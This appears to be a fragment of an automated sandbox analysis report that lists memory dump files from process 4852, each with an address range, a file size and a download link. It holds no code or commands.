memory/4852-785-0x000001CED6FE0000-0x000001CED7092000-memory.dmp

Filesize
712KB

Download
memory/4852-781-0x000001CED6ED0000-0x000001CED6F20000-memory.dmp

Filesize
320KB

Download
memory/4852-362-0x000001CED4330000-0x000001CED49D4000-memory.dmp

Filesize
6.6MB

Download
memory/4852-383-0x0000000180000000-0x0000000180007000-memory.dmp

Filesize
28KB

Download
memory/4852-364-0x00007FF8C30A0000-0x00007FF8C315D000-memory.dmp

Filesize
756KB

Download
memory/4852-365-0x00007FF8C3C20000-0x00007FF8C3E29000-memory.dmp

Filesize
2.0MB

Download
memory/4852-369-0x000001CE9B710000-0x000001CE9B732000-memory.dmp

Filesize
136KB

Download
memory/4852-370-0x000001CEB4090000-0x000001CEB4096000-memory.dmp

Filesize
24KB

Download
memory/4852-371-0x000001CEBC190000-0x000001CEBC196000-memory.dmp

Filesize
24KB

Download
memory/4852-372-0x000001CED55E0000-0x000001CED5B2C000-memory.dmp

Filesize
5.3MB

Download
memory/4852-374-0x000001CED5B30000-0x000001CED62DA000-memory.dmp

Filesize
7.7MB

Download
memory/4852-376-0x000001CED6670000-0x000001CED6722000-memory.dmp

Filesize
712KB

Download
memory/4852-375-0x000001CED62E0000-0x000001CED666C000-memory.dmp

Filesize
3.5MB

Download
memory/4852-378-0x000001CED6B20000-0x000001CED6B8A000-memory.dmp

Filesize
424KB

Download
memory/4852-379-0x000001CED7140000-0x000001CED7182000-memory.dmp

Filesize
264KB

Download